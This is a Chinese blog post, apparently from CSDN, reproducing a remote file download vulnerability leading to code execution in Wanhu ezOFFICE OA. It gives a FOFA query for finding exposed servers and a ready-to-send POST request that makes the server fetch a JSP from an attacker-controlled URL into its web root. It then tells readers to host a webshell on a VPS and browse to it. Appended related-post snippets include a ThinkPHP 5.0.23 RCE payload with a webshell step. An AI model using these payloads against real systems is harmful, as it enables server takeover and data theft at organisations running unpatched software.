【漏洞复现】万户OA file2Html.controller 远程文件下载漏洞(RCE)

已于 2024-05-20 12:39:42 修改
阅读量637 收藏 4
点赞数 10
文章标签: web安全 安全
于 2024-01-30 17:03:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54798939/article/details/135937044
版权

【漏洞复现】万户OA file2Html.controller 远程文件下载漏洞(RCE)

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

fofa: app="万户网络-ezOFFICE"

微信公众号搜索:潜陌安全 该文章潜陌安全公众号首发

  • 漏洞描述

万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。 万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。

在这里插入图片描述

  • 漏洞复现

这个漏洞没有可以判断的状态码

POST /defaultroot/yzConvertFile/file2Html.controller HTTP/1.1

Host: ip

User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/116.0.0.0 Safari/537.36

Connection: close

Content-Length: 98

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate, br

 

fileName=qwe.jsp&path=../platform/portal/&url=http://dnslog.com

在这里插入图片描述

dnslog成功响应,漏洞存在

  • 漏洞利用

首先进行上一步的操作,在攻击机vps上放马即可访问下面链接即可

Url/defaultroot/platform/portal/com/qwe.jsp

  • 工具检测

借助大佬写好的nuclei即可完成检测

https://github.com/iamHuFei/HVVault/blob/06cb093d937e18afe2c3d6795721a235c5ae0049/oa/%E4%B8%87%E6%88%B7OA/wanhu-ezoffice-file2html-controller-remotedownload.yaml#L17

在这里插入图片描述
关注关注作者公众号 :)

分析最新poc,使用渗透测试小工具
在这里插入图片描述

sheep_qm
关注
万户oa漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-25 2291
万户oa漏洞复现万户oa漏洞详情 /defaultroot/officeserverservlet 路径存在文件上传漏洞 万户oa漏洞复现 POST /defaultroot/officeserverservlet HTTP/1.1 Host: XXXXXXXXX:7001 Content-Length: 782 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://XXXXXXXX7001 User-Agent
通达OA任意文件上传配合文件包含导致的RCE.md
04-12
通达OA任意文件上传配合文件包含导致的RCE
万户OA漏洞分析、利用与防护
不忘初心,护天下安全!
09-29 3399
万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞,导致攻击者可上传任意文件获取服务器权限。万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。2.使用防火墙等设备对所有相关poc进行检测、防护。可直接上传恶意jsp文件。
漏洞复现万户OA-ezOFFICE DocumentEdit_unite.jsp Sql 注入漏洞
最新发布
凝聚力安全团队
07-26 993
万户OA-ezOFFICE DocumentEdit_unite.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
万户OA upload任意文件上传漏洞复现
0xSec
11-20 1366
万户ezOFFICE协同管理平台upload接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。
万户协同办公平台 ezoffice未授权访问漏洞
xiaokp7的博客
09-13 835
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户ezoffice协同管理平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 1409
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP。
漏洞复现万户协同办公平台未授权访问漏洞
失心少年
08-29 529
万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!
万户OA jsp/view.jsp反射型XSS漏洞分析与自动化验证脚本
afei001
01-09 351
万户OA jsp/view.jsp反射型XSS漏洞分析与自动化验证脚本。
Goby 漏洞更新 | 万户 OA OfficeServer.jsp 任意文件上传漏洞
m0_46699477的博客
04-27 1781
ezOFFICE OA是面向政府机关、企事业单位的FlexOffice独立安全协同办公平台。 ezOFFICE OA OfficeServer jsp存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件控制整个服务器。
万户OA某接口存在RCE漏洞-0day未公开漏洞
weixin_43167326的博客
02-02 517
万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。
万户OA ezOffice RhinoScriptEngineService 命令执行漏洞-1day未公开漏洞
weixin_43167326的博客
02-26 545
万户OA RhinoScriptEngineService接口存在命令执行漏洞,此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
万户OA RhinoScriptEngineService 命令执行漏洞
weixin_43567873的博客
03-10 178
万户OA RhinoScriptEngineService 命令执行漏洞
万户OA text2Html接口存在任意文件读取漏洞
3tefanie丶zhou的博客
12-19 869
【一个人要有多少血性才算是个好人?】
漏洞复现万户OA-wpsservlet-任意文件上传
知黑而守白
01-19 190
万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。万户OA wpsservlet 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值